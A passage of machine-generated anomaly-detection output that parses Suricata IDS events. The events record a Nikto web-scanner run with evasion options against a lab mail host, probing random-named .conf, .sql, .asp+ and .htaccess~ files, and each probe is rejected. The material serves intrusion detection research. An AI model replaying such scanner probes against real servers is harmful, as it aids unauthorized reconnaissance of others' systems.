"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.conf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46850, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":656541569686162,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 656541569686162, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.237117+0000\",\"flow_id\":656541569686162,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.239413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46852 -> 192.168.10.154:80", "/parser/model/time": 1583349514.239413, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46852, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.239413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46852 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sql", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.239713+0000\",\"flow_id\":499362946523941,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.239713, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":499362946523941,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sql\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sql\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sql", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sql", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46852, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":499362946523941,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 499362946523941, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.239713+0000\",\"flow_id\":499362946523941,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.241805 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46854 -> 192.168.10.154:80", "/parser/model/time": 1583349514.241805, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46854, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.241805 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46854 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.asp+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.242016+0000\",\"flow_id\":2006664539188459,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.242016, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2006664539188459,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.asp+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.asp+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.asp+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.asp+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46854, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2006664539188459,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2006664539188459, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.242016+0000\",\"flow_id\":2006664539188459,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46854,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": 
[ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.243409 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46856 -> 192.168.10.154:80", "/parser/model/time": 1583349514.243409, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46856, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.243409 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46856 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": 
"NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.htaccess~", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.243594+0000\",\"flow_id\":1380698825602070,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.243594, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1380698825602070,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htaccess~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46856,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htaccess~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", 